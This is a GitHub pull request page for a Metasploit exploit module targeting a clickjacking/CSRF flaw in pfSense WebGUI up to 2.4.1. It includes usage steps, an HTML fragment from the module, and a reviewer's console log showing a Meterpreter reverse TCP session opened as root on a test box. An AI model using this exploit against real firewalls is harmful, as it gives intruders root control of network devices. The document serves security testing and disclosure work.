Skip to content

Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 6 commits into from
Dec 12, 2017
Merged

Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

merged 6 commits into from
Dec 12, 2017

Conversation

ykoster
Copy link
Contributor

@ykoster ykoster commented Nov 22, 2017
edited by wchen-r7
Loading

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.

Verification

The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.

  • use exploit/unix/http/pfsense_clickjacking
  • set TARGETURI https://<ip WebGUI>
  • exploit
  • Browse to the URL returned by MSF
  • Click anywhere on the returned page
  • Note that a new Meterpreter sessions was started.

jvoisin
jvoisin reviewed Nov 27, 2017
View reviewed changes
modules/exploits/unix/http/pfsense_clickjacking.rb Outdated
resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't think that we want to depend on external javascript :/

@ykoster
Copy link
Contributor Author

ykoster commented Dec 2, 2017

Included static content as suggested by @jvoisin

@wchen-r7 wchen-r7 self-assigned this Dec 12, 2017
@wchen-r7
Copy link
Contributor

Works as advertised:

msf exploit(pfsense_clickjacking) > show options

Module options (exploit/unix/http/pfsense_clickjacking):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   SRVHOST    0.0.0.0               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  http://172.16.85.132  yes       The base path to the web application
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.85.1      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   pfSense <= 2.4.1


msf exploit(pfsense_clickjacking) > set srvhost 172.16.85.1
srvhost => 172.16.85.1
msf exploit(pfsense_clickjacking) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/vB3oWRYgtwaFtR
[*] Server started.
msf exploit(pfsense_clickjacking) > [*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.css Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.js Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/background.jpg Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] Sending stage (37543 bytes) to 172.16.85.132
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.132:43529) at 2017-12-12 14:25:36 -0600

@wchen-r7 wchen-r7 merged commit 942e44c into rapid7:master Dec 12, 2017
wchen-r7 added a commit that referenced this pull request Dec 12, 2017
@wchen-r7
Land #9234, Add exploit for ClickJacking vuln for pfSense
37514ee 
Land #9234
@wchen-r7
Copy link
Contributor

Release Notes

This exploits a CSRF in pfSense that allows the attack to perform a click-jacking attack.

@stevenseeley
Copy link
Contributor

stevenseeley commented Dec 12, 2017
edited
Loading

I know this is already merged, but I am just curious, where in the module is the csrf click jacking page used (csrf-magic.php) as per the blog post? This looks like a csrf attack to diag_command.php, in which case, no clicky is required.

@h00die
Copy link
Contributor

h00die commented Dec 12, 2017

Line 82 shows diag_command.php as the target

@stevenseeley
Copy link
Contributor

stevenseeley commented Dec 13, 2017
edited
Loading

huh, where? also, my point still stands. This is csrf isn't it?

@h00die
Copy link
Contributor

h00die commented Dec 13, 2017

https://github.com/rapid7/metasploit-framework/pull/9234/files#diff-5b9c9bad22d0dde20b2a408968e1490cR82

@stevenseeley
Copy link
Contributor

Yep, I see how its working now. My bad.

@ykoster
Copy link
Contributor Author

ykoster commented Dec 13, 2017

I suppose targeting the file editor would also work, less trivial though

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

Assignees

@wchen-r7 wchen-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
8 participants
@ykoster @wchen-r7 @stevenseeley @h00die @jvoisin @tdoan-r7 @acammack-r7 @bwatters-r7